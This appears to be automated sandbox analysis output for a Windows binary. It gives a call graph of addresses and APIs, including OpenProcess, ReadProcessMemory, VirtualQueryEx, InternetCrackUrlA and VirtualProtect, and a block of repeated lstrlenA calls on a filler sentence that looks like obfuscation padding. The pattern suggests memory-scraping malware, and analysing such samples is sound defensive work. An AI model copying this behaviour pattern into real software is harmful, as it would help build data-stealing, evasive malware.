13725->13727 13726 4050c0 memcpy 13726->13727 13727->13726 13728 4050f0 13727->13728 13728->12968 13913 409920 13729->13913 13731 410599 13732 410878 13731->13732 13733 4105bd 13731->13733 13940 410090 13732->13940 13740 410683 13733->13740 13916 40f940 13733->13916 13735 41088e 13735->12970 13737 41086d 13737->12970 13738 4107ab 13738->13737 13932 40fe70 13738->13932 13740->13738 13924 40fba0 13740->13924 14098 41a4a0 13742->14098 13744 410ca7 strtok_s 13747 410cb4 13744->13747 13745 410dc0 13745->12974 13746 410d9c strtok_s 13746->13747 13747->13745 13747->13746 13752 401ecf 13748->13752 13749 401f77 14103 401310 memset 13749->14103 13751 401f8d 13751->12976 13752->13749 14099 401710 13752->14099 14109 41a4a0 13754->14109 13756 410e16 strtok_s 13759 410e4b moneypunct 13756->13759 13757 411283 13757->12985 13758 411250 strtok_s 13758->13759 13759->13757 13759->13758 13762 4138df 13760->13762 13761 413928 13761->12986 13762->13761 14110 4137a0 13762->14110 14123 41a4a0 13764->14123 13766 413097 strtok_s 13770 4130b1 13766->13770 13767 4131d7 strtok_s 13767->13770 13768 4131fb 13768->12986 13770->13767 13770->13768 14124 412940 13770->14124 13772 413c0a moneypunct 13771->13772 14133 4139b0 13772->14133 13774 413c95 13775 4139b0 7 API calls 13774->13775 13776 413cbf 13775->13776 13777 4139b0 7 API calls 13776->13777 13778 413ce9 13777->13778 13779 4139b0 7 API calls 13778->13779 13780 413d13 13779->13780 13781 4139b0 7 API calls 13780->13781 13782 413d3d 13781->13782 13783 4139b0 7 API calls 13782->13783 13784 413d67 moneypunct 13783->13784 13784->12992 13786 414bf3 13785->13786 14137 416d90 13786->14137 13788 414bf8 13789 414c70 7 API calls 13788->13789 13790 414c43 13789->13790 13790->12988 13792 41427a moneypunct 13791->13792 13794 41438f moneypunct 13792->13794 14300 414050 13792->14300 13794->12991 13796 4146aa moneypunct 13795->13796 14312 4143f0 13796->14312 13798 41471d 13799 4143f0 7 API calls 13798->13799 13800 414752 13799->13800 13801 4143f0 7 API calls 13800->13801 13802 414788 13801->13802 13803 4143f0 7 API calls 13802->13803 13804 4147bd 13803->13804 13805 4143f0 7 API calls 13804->13805 13806 4147f3 13805->13806 13807 4143f0 7 API calls 13806->13807 13808 414828 moneypunct 13807->13808 13808->12994 13810 41487e 13809->13810 13811 4143f0 7 API calls 13810->13811 13812 4148df memset 13811->13812 13813 41490a 13812->13813 13814 4143f0 7 API calls 13813->13814 13815 41496b memset 13814->13815 13816 414996 13815->13816 13817 4143f0 7 API calls 13816->13817 13818 4149f7 memset 13817->13818 13819 414a1c 13818->13819 13819->12995 13821 414a3a moneypunct 13820->13821 13822 4143f0 7 API calls 13821->13822 13823 414ad3 13822->13823 13824 4143f0 7 API calls 13823->13824 13825 414b08 moneypunct 13824->13825 13825->12999 13827 40775d moneypunct 13826->13827 14317 407610 13827->14317 13830 407610 13 API calls 13831 407cdf 13830->13831 13832 407610 13 API calls 13831->13832 13833 407cee 13832->13833 13834 407610 13 API calls 13833->13834 13835 407cfd 13834->13835 13836 407610 13 API calls 13835->13836 13837 407d0c 13836->13837 13838 407610 13 API calls 13837->13838 13839 407d1b 13838->13839 13840 407610 13 API calls 13839->13840 13841 407d2a 13840->13841 13842 407610 13 API calls 13841->13842 13843 407d39 13842->13843 13844 407610 13 API calls 13843->13844 13845 407d48 13844->13845 13846 407610 13 API calls 13845->13846 13847 407d57 13846->13847 13848 407610 13 API calls 13847->13848 13849 407d66 13848->13849 13850 407610 13 API calls 13849->13850 13851 407d75 13850->13851 13852 407610 13 API calls 13851->13852 13853 407d84 13852->13853 13854 407610 13 API calls 13853->13854 13855 407d93 13854->13855 13856 407610 13 API calls 13855->13856 13857 407da2 13856->13857 13858 407610 13 API calls 13857->13858 13859 407db1 13858->13859 13860 407610 13 API calls 13859->13860 13861 407dc0 13860->13861 13862 407610 13 API calls 13861->13862 13863 407dcf 13862->13863 13864 407610 13 API calls 13863->13864 13865 407dde 13864->13865 13866 407610 13 API calls 13865->13866 13867 407ded 13866->13867 13868 407610 13 API calls 13867->13868 13869 407dfc 13868->13869 13870 407610 13 API calls 13869->13870 13871 407e0b 13870->13871 13872 407610 13 API calls 13871->13872 13873 407e1a 13872->13873 13874 407610 13 API calls 13873->13874 13875 407e29 moneypunct 13874->13875 13876 414c70 7 API calls 13875->13876 13877 407eb7 moneypunct 13875->13877 13876->13877 13877->13002 13879 414b4a moneypunct 13878->13879 13880 4143f0 7 API calls 13879->13880 13881 414bbd moneypunct 13880->13881 13881->13004 13883 418ac7 moneypunct 13882->13883 13887 418aed 13883->13887 14496 4189d0 13883->14496 13885 418be0 13886 414c70 7 API calls 13885->13886 13885->13887 13886->13887 13887->12997 13894 401030 13888->13894 13891 404888 13892 404898 InternetCrackUrlA 13891->13892 13893 4048b7 13892->13893 13893->13680 13895 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 13894->13895 13895->13891 13896->13699 13897->13705 13898->13711 13900 414c95 13899->13900 13903 405150 13900->13903 13902 414caf 13902->13724 13904 405169 13903->13904 13905 404800 4 API calls 13904->13905 13906 405175 13905->13906 13907 4057d7 memcpy 13906->13907 13912 40585d moneypunct 13906->13912 13908 4057f8 13907->13908 13909 4057ff memcpy 13908->13909 13910 405817 13909->13910 13911 405837 memcpy 13910->13911 13911->13912 13912->13902 13951 4098d0 ??2@YAPAXI 13913->13951 13915 409931 13915->13731 13918 40f956 13916->13918 13917 40fa73 13971 40bcb0 13917->13971 13918->13917 13965 409d30 13918->13965 13921 40fada 13982 40ea70 13921->13982 13923 40fb4c 13923->13740 13925 40fbb6 13924->13925 13926 40fd3a 13925->13926 13927 409d30 2 API calls 13925->13927 13928 40bcb0 11 API calls 13926->13928 13927->13926 13929 40fda1 13928->13929 13930 40ea70 7 API calls 13929->13930 13931 40fe13 13930->13931 13931->13738 13933 40fe86 13932->13933 13939 41005e 13933->13939 14025 4121d0 13933->14025 13935 40ff78 13935->13939 14039 40d8c0 13935->14039 13937 40ffdf 14047 40f4f0 13937->14047 13939->13737 13941 4100a6 13940->13941 13942 41014f strtok_s 13941->13942 13943 41052e 13941->13943 13950 410174 13942->13950 13943->13735 13944 4104ca 13945 414c70 7 API calls 13944->13945 13946 410504 13945->13946 13947 410515 memset 13946->13947 13947->13943 13948 418380 malloc strncpy 13948->13950 13949 4104af strtok_s 13949->13950 13950->13944 13950->13948 13950->13949 13954 407000 13951->13954 13953 4098fd moneypunct 13953->13915 13957 406d90 13954->13957 13956 407028 13956->13953 13958 406db3 13957->13958 13960 406da9 13957->13960 13958->13960 13961 406a00 13958->13961 13960->13956 13962 406a19 13961->13962 13963 406a25 13961->13963 13962->13963 13964 406afd memcpy 13962->13964 13963->13960 13964->13963 13967 409d53 13965->13967 13966 409e0a 13966->13917 13967->13966 13968 409dd7 memcmp 13967->13968 13968->13966 13969 409def 13968->13969 13986 409bb0 13969->13986 13973 40bcc6 13971->13973 13972 40bd44 13972->13921 13973->13972 13975 40bcb0 11 API calls 13973->13975 13976 40a6c0 11 API calls 13973->13976 13978 414c70 7 API calls 13973->13978 13990 40a1b0 13973->13990 13996 40ad70 13973->13996 14000 40b370 13973->14000 14006 40b8e0 13973->14006 14012 40b0b0 13973->14012 13975->13973 13976->13973 13978->13973 13985 40ea7f 13982->13985 13983 40eb39 13983->13923 13985->13983 14021 40e270 13985->14021 13987 409bda 13986->13987 13988 409c1f 13987->13988 13989 409c06 memcpy 13987->13989 13988->13966 13989->13988 13995 40a1c6 13990->13995 13991 40a5e1 13993 414c70 7 API calls 13991->13993 13992 40a625 13992->13973 13993->13992 13995->13991 13995->13992 14016 409e60 13995->14016 13999 40ad86 13996->13999 13997 414c70 7 API calls 13998 40b039 13997->13998 13998->13973 13999->13997 13999->13998 14005 40b386 14000->14005 14001 40b817 14002 414c70 7 API calls 14001->14002 14003 40b86f 14001->14003 14002->14003 14003->13973 14004 409e60 2 API calls 14004->14005 14005->14001 14005->14003 14005->14004 14011 40b8f6 14006->14011 14007 409e60 2 API calls 14007->14011 14008 40bbda 14009 414c70 7 API calls 14008->14009 14010 40bc32 14008->14010 14009->14010 14010->13973 14011->14007 14011->14008 14011->14010 14013 40b0c6 14012->14013 14014 414c70 7 API calls 14013->14014 14015 40b2fd 14013->14015 14014->14015 14015->13973 14017 409e70 memcmp 14016->14017 14020 409f04 14016->14020 14018 409e8c 14017->14018 14017->14020 14019 409ea6 memset 14018->14019 14018->14020 14019->14020 14020->13995 14023 40e28d 14021->14023 14022 40e2f1 14022->13985 14023->14022 14024 40dc50 7 API calls 14023->14024 14024->14023 14026 41272b 14025->14026 14027 4121e6 14025->14027 14026->13935 14053 4060f0 14027->14053 14029 412671 14030 4060f0 4 API calls 14029->14030 14031 412698 14030->14031 14032 4060f0 4 API calls 14031->14032 14033 4126bc 14032->14033 14034 4060f0 4 API calls 14033->14034 14035 4126e3 14034->14035 14036 4060f0 4 API calls 14035->14036 14037 412707 14036->14037 14038 4060f0 4 API calls 14037->14038 14038->14026 14043 40d8d6 14039->14043 14040 40d93a 14040->13937 14043->14040 14046 40d8c0 11 API calls 14043->14046 14057 40cd30 14043->14057 14063 40d240 14043->14063 14067 40c7d0 14043->14067 14075 40d5c0 14043->14075 14046->14043 14051 40f506 14047->14051 14048 40f56d 14048->13939 14049 40f4f0 8 API calls 14049->14051 14051->14048 14051->14049 14079 418f70 14051->14079 14083 40f2e0 14051->14083 14054 406109 14053->14054 14055 404800 4 API calls 14054->14055 14056 406115 moneypunct 14055->14056 14056->14029 14060 40cd46 14057->14060 14058 40d1c0 memset 14059 40d1d1 14058->14059 14059->14043 14060->14058 14060->14059 14061 414c70 7 API calls 14060->14061 14062 40d1af 14061->14062 14062->14058 14066 40d256 14063->14066 14064 40d527 14064->14043 14065 414c70 7 API calls 14065->14064 14066->14064 14066->14065 14069 40c7e4 14067->14069 14068 40ccbf 14068->14043 14069->14068 14070 40c8ee ??2@YAPAXI 14069->14070 14073 40c91f 14070->14073 14071 40cc7b 14072 414c70 7 API calls 14071->14072 14072->14068 14073->14071 14074 40c660 memset memcpy 14073->14074 14074->14073 14076 40d5d6 14075->14076 14077 40d82e 14076->14077 14078 414c70 7 API calls 14076->14078 14077->14043 14078->14077 14087 41d220 14079->14087 14082 418fa3 14082->14051 14085 40f2ff 14083->14085 14084 40f493 14084->14051 14085->14084 14089 40f140 14085->14089 14088 418f7d memset 14087->14088 14088->14082 14090 40f153 14089->14090 14092 40f27c 14090->14092 14093 40eb60 14090->14093 14092->14084 14095 40eb71 14093->14095 14094 40ebaa 14094->14092 14095->14094 14096 414c70 7 API calls 14095->14096 14097 40eb60 7 API calls 14095->14097 14096->14095 14097->14095 14098->13744 14100 401726 moneypunct 14099->14100 14101 401972 14100->14101 14102 414c70 7 API calls 14100->14102 14101->13752 14102->14100 14104 401344 14103->14104 14105 414c70 7 API calls 14104->14105 14106 4014d2 14104->14106 14108 40152a 14104->14108 14105->14106 14107 40150b memset 14106->14107 14107->14108 14108->13751 14109->13756 14117 41a4a0 14110->14117 14112 4137ba strtok_s 14114 4137ce 14112->14114 14113 413842 moneypunct 14113->13762 14114->14113 14116 413857 strtok_s 14114->14116 14118 4133c0 14114->14118 14116->14114 14117->14112 14120 4133e2 moneypunct __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14118->14120 14119 413419 14119->14114 14120->14119 14121 4133c0 7 API calls 14120->14121 14122 414c70 7 API calls 14120->14122 14121->14120 14122->14120 14123->13766 14127 412956 14124->14127 14125 412cf5 14131 4060f0 4 API calls 14125->14131 14126 412b57 14132 4060f0 4 API calls 14126->14132 14127->14125 14127->14126 14128 412ea8 14127->14128 14129 412c6a 14127->14129 14130 4060f0 4 API calls 14128->14130 14129->13770 14130->14129 14131->14129 14132->14129 14135 4139d9 moneypunct 14133->14135 14134 4139ff moneypunct 14134->13774 14135->14134 14136 414c70 7 API calls 14135->14136 14136->14135 14138 416d9e 14137->14138 14141 416b70 ??_U@YAPAXI 14138->14141 14140 416dad 14140->13788 14156 41a110 14141->14156 14143 416bb1 OpenProcess 14144 416be8 allocator 14143->14144 14155 416bcb 14143->14155 14145 416bf5 memset 14144->14145 14146 416d4e ??_V@YAXPAX 14144->14146 14148 416c65 14144->14148 14149 416c79 ReadProcessMemory 14144->14149 14152 4080a0 memcpy codecvt 14144->14152 14153 416d15 14144->14153 14165 416dc0 14144->14165 14171 416600 14144->14171 14158 4169a0 strlen ??_U@YAPAXI 14145->14158 14146->14155 14148->14146 14149->14144 14152->14144 14185 4080a0 14153->14185 14155->14140 14157 41a120 14156->14157 14157->14143 14188 416670 strlen 14158->14188 14160 416a24 VirtualQueryEx 14161 416b49 ??_V@YAXPAX 14160->14161 14162 416a0c 14160->14162 14164 416aa8 14161->14164 14162->14160 14163 416880 ReadProcessMemory 14162->14163 14162->14164 14163->14162 14164->14144 14166 416dd1 allocator 14165->14166 14192 4082d0 14166->14192 14168 416de5 14196 4082a0 14168->14196 14172 416dc0 9 API calls 14171->14172 14173 416613 14172->14173 14275 416e40 14173->14275 14176 41662f 14279 416e70 14176->14279 14177 41664e 14283 4095a0 14177->14283 14182 4080a0 codecvt memcpy 14184 416649 14182->14184 14183 4080a0 codecvt memcpy 14183->14184 14184->14144 14186 4082d0 codecvt memcpy 14185->14186 14187 4080b3 task 14186->14187 14187->14155 14189 4166a1 strlen 14188->14189 14190 416800 14189->14190 14191 4166b7 14189->14191 14190->14162 14191->14189 14193 4082e3 14192->14193 14195 4082e1 codecvt task 14192->14195 14193->14195 14201 407230 memcpy 14193->14201 14195->14168 14202 407210 strlen 14196->14202 14198 4082b0 14203 408660 14198->14203 14200 4082c0 14200->14144 14201->14195 14202->14198 14204 408673 14203->14204 14205 40869a 14204->14205 14206 40867a allocator 14204->14206 14225 408d10 14205->14225 14212 408c50 14206->14212 14209 408698 codecvt 14209->14200 14210 4086a8 allocator 14210->14209 14234 407230 memcpy 14210->14234 14213 408c61 allocator 14212->14213 14215 408c6e allocator 14213->14215 14235 408720 14213->14235 14216 408c92 14215->14216 14217 408cb7 14215->14217 14238 408f80 14216->14238 14218 408d10 allocator 7 API calls 14217->14218 14223 408cc5 allocator 14218->14223 14220 408ca7 14221 408f80 allocator 6 API calls 14220->14221 14222 408cb5 codecvt 14221->14222 14222->14209 14223->14222 14244 407230 memcpy 14223->14244 14226 408d21 allocator 14225->14226 14227 408d2e 14226->14227 14253 408df0 14226->14253 14229 408d39 14227->14229 14232 408d4e 14227->14232 14256 409050 14229->14256 14231 408d4c codecvt 14231->14210 14232->14231 14233 4082d0 codecvt memcpy 14232->14233 14233->14231 14234->14209 14245 41d320 14235->14245 14239 408f94 14238->14239 14241 408f9c allocator 14238->14241 14240 408720 allocator 5 API calls 14239->14240 14240->14241 14243 408fe9 codecvt 14241->14243 14252 407250 memmove 14241->14252 14243->14220 14244->14222 14246 41a539 std::exception::exception strlen malloc strcpy_s 14245->14246 14247 41d33a 14246->14247 14248 41d394 __CxxThrowException@8 RaiseException 14247->14248 14249 41d34f 14248->14249 14250 41a5c7 std::exception::exception strlen malloc strcpy_s free 14249->14250 14251 408731 14250->14251 14251->14215 14252->14243 14264 41d2d3 14253->14264 14258 409086 allocator 14256->14258 14271 409220 14258->14271 14259 409180 14260 4082d0 codecvt memcpy 14259->14260 14262 40918f codecvt 14260->14262 14261 4090fe allocator 14261->14259 14274 407230 memcpy 14261->14274 14262->14231 14265 41a539 std::exception::exception strlen malloc strcpy_s 14264->14265 14266 41d2ed 14265->14266 14267 41d394 __CxxThrowException@8 RaiseException 14266->14267 14268 41d302 14267->14268 14269 41a5c7 std::exception::exception strlen malloc strcpy_s free 14268->14269 14270 408e01 14269->14270 14270->14227 14272 409440 allocator 5 API calls 14271->14272 14273 409232 14272->14273 14273->14261 14274->14259 14276 416e4f allocator 14275->14276 14289 416f00 14276->14289 14278 416621 14278->14176 14278->14177 14280 416e85 14279->14280 14294 416eb0 14280->14294 14284 4095b8 allocator 14283->14284 14285 4082d0 codecvt memcpy 14284->14285 14286 4095cc 14285->14286 14287 408c50 allocator 8 API calls 14286->14287 14288 4095dc 14287->14288 14288->14183 14290 416f5e allocator 14289->14290 14292 416f14 allocator 14289->14292 14290->14278 14292->14290 14293 4165e0 memchr 14292->14293 14293->14292 14295 416ec5 allocator 14294->14295 14296 4082d0 codecvt memcpy 14295->14296 14297 416ed9 14296->14297 14298 408c50 allocator 8 API calls 14297->14298 14299 416641 14298->14299 14299->14182 14303 414066 14300->14303 14301 4140b2 moneypunct 14301->13794 14302 414179 moneypunct 14302->14301 14305 414c70 7 API calls 14302->14305 14303->14301 14303->14302 14306 413d90 memset memset 14303->14306 14305->14301 14307 413dea 14306->14307 14308 409d30 2 API calls 14307->14308 14311 413f7e moneypunct 14307->14311 14309 413ea0 moneypunct 14308->14309 14310 409e60 2 API calls 14309->14310 14309->14311 14310->14311 14311->14303 14315 414412 moneypunct 14312->14315 14313 414438 14313->13798 14314 4143f0 7 API calls 14314->14315 14315->14313 14315->14314 14316 414c70 7 API calls 14315->14316 14316->14315 14322 407310 14317->14322 14320 407740 14320->13830 14321 40762b 14337 408160 14321->14337 14323 40731d 14322->14323 14324 40732e memset 14323->14324 14336 407380 14324->14336 14325 407580 14362 408120 14325->14362 14328 408160 task memcpy 14329 40759a 14328->14329 14329->14321 14334 4080c0 9 API calls 14334->14336 14335 409270 strcpy_s 14335->14336 14336->14325 14336->14334 14336->14335 14340 4075b0 14336->14340 14345 409290 vsprintf_s 14336->14345 14346 4081a0 14336->14346 14357 4075e0 14336->14357 14338 408560 task memcpy 14337->14338 14339 40816f task 14338->14339 14339->14320 14366 408070 14340->14366 14343 408070 memcpy 14344 4075cd 14343->14344 14344->14336 14345->14336 14347 4081b2 construct 14346->14347 14348 408242 14347->14348 14352 4081c5 construct 14347->14352 14349 40825a 14348->14349 14350 4084f0 9 API calls 14348->14350 14381 4092d0 14349->14381 14350->14349 14351 4081f9 14377 409310 14351->14377 14352->14351 14370 4084f0 14352->14370 14355 40822e 14355->14336 14358 4080a0 codecvt memcpy 14357->14358 14359 4075f2 14358->14359 14360 4080a0 codecvt memcpy 14359->14360 14361 4075fd 14360->14361 14361->14336 14363 408138 construct allocator 14362->14363 14454 4083c0 14363->14454 14365 40758f 14365->14328 14367 408081 allocator 14366->14367 14368 4082d0 codecvt memcpy 14367->14368 14369 4075c2 14368->14369 14369->14343 14371 408501 14370->14371 14372 408514 14371->14372 14375 40851e 14371->14375 14385 408b70 14372->14385 14374 40851c 14374->14351 14375->14374 14388 408860 14375->14388 14378 40931c construct 14377->14378 14438 4094f0 14378->14438 14382 4092dc construct 14381->14382 14447 4094d0 14382->14447 14386 41d2d3 std::_Xinvalid_argument 5 API calls 14385->14386 14387 408b81 14386->14387 14387->14374 14389 40888d 14388->14389 14390 408892 14389->14390 14392 40889f 14389->14392 14391 408b70 5 API calls 14390->14391 14397 40889a task 14391->14397 14392->14397 14399 408ea0 14392->14399 14396 4088e2 14396->14397 14405 408ae0 14396->14405 14397->14374 14408 4093e0 14399->14408 14402 409330 14422 409600 14402->14422 14430 409360 14405->14430 14409 4088bf 14408->14409 14410 4093fc 14408->14410 14409->14402 14411 409405 ??2@YAPAXI 14410->14411 14412 40941e 14410->14412 14411->14409 14411->14412 14416 407180 14412->14416 14417 41a539 std::exception::exception strlen malloc strcpy_s 14416->14417 14418 407193 14417->14418 14419 41d394 14418->14419 14420 41d3c9 RaiseException 14419->14420 14421 41d3bd 14419->14421 14420->14409 14421->14420 14423 409611 _Copy_impl 14422->14423 14426 409790 14423->14426 14429 4097bf 14426->14429 14427 40934f 14427->14396 14428 409310 construct 8 API calls 14428->14429 14429->14427 14429->14428 14431 409371 _Copy_impl 14430->14431 14434 409660 14431->14434 14435 409665 14434->14435 14436 408afb 14435->14436 14437 409850 task memcpy 14435->14437 14436->14397 14437->14435 14440 409504 construct allocator 14438->14440 14439 40932c 14439->14355 14440->14439 14442 409540 14440->14442 14443 4095a0 allocator 8 API calls 14442->14443 14444 409563 14443->14444 14445 4095a0 allocator 8 API calls 14444->14445 14446 409575 14445->14446 14446->14439 14450 4096d0 14447->14450 14452 4096e7 construct allocator 14450->14452 14451 4092ec 14451->14355 14452->14451 14453 409540 allocator 8 API calls 14452->14453 14453->14451 14455 4083d6 14454->14455 14460 4083d1 std::error_category::default_error_condition 14454->14460 14456 408457 14455->14456 14457 4083ff 14455->14457 14478 408560 14456->14478 14463 408a90 14457->14463 14460->14365 14461 408407 construct 14461->14460 14467 408740 14461->14467 14464 408aa5 14463->14464 14482 408e10 14464->14482 14468 408752 construct 14467->14468 14469 4087ef 14468->14469 14470 408769 construct 14468->14470 14471 4084f0 9 API calls 14469->14471 14472 408807 construct 14469->14472 14473 4084f0 9 API calls 14470->14473 14474 40879d construct 14470->14474 14471->14472 14475 409310 construct 8 API calls 14472->14475 14473->14474 14477 409310 construct 8 API calls 14474->14477 14476 4087db 14475->14476 14476->14461 14477->14476 14479 40858c task 14478->14479 14480 40856f task 14478->14480 14479->14460 14481 408ae0 task memcpy 14480->14481 14481->14479 14483 408e29 std::error_category::default_error_condition 14482->14483 14484 408acf 14483->14484 14488 4093a0 14483->14488 14484->14461 14487 408ae0 task memcpy 14487->14484 14489 4093b1 _Copy_impl 14488->14489 14492 409690 14489->14492 14494 409695 construct 14492->14494 14493 408e60 14493->14487 14494->14493 14495 409720 _Copy_impl 8 API calls 14494->14495 14495->14494 14497 4189f9 14496->14497 14498 418a07 malloc 14497->14498 14499 4189ff 14497->14499 14498->14499 14500 418a25 14498->14500 14499->13885 14500->14499 14501 418a6d memset 14500->14501 14501->14499 15109 416593 15111 416551 15109->15111 15110 4155f0 129 API calls 15112 4165b6 15110->15112 15111->15110

            Control-flow Graph

            APIs
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
            • strlen.MSVCRT ref: 00404740
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
            Strings
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
